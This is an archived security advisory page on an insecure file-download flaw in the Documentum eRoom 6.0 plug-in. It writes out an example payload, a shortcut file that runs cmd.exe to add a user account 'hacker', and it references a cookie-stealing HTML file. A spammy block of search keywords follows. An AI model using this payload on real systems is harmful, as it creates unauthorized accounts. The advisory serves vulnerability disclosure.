about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , eRoom Plug-In Insecure File Download Handling Vulnerability


Title eRoom Plug-In Insecure File Download Handling Vulnerability
Published 2005-07-06-12:00AM
Updated 2005-07-06-11:18PM
Class Design Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  Discovered by c0ntex - c0ntexb[at]gmail.com.
Vulnerable  Documentum eRoom 6.0
Not Vulnerable  
Code   No exploit is required, the following examples are available:

Create and upload a shortcut file that contains the following:
%SystemRoot%system32cmd.exe /k net user hacker hackerpass /ADD

The following HTML code demonstrates an attack that will obtain, for the attacker, the cookie value of the target user session: /data/vulnerabilities/exploits/eroom.txt
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 23:31:33 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
mambo Remo Pakisong.C Www.Sixy v /www.kuale Klip video H...2Fself iyotub www.mqdm.n Crack Data rfi irc bo maxcpm.inf miss denma www.sex.co MERS www.trish server.cgi p...ude/ch ANIMALLADY 200 /compo Cerita sex news for c www.kashmi mambo Remo sexvideoa Nortel+Net news for c 89.cojm www.z1 sex live+sex++ saxy photo www.avizoo www.animal www.ezchai indiangira t187t MemHT_Port lpd FOTONGENTO 5.0.20 nude pic a www.slazy PHP 4.3.10 addguest.h Paling pan qmail expl cico news searc www.world maxcpm.inf www.sex17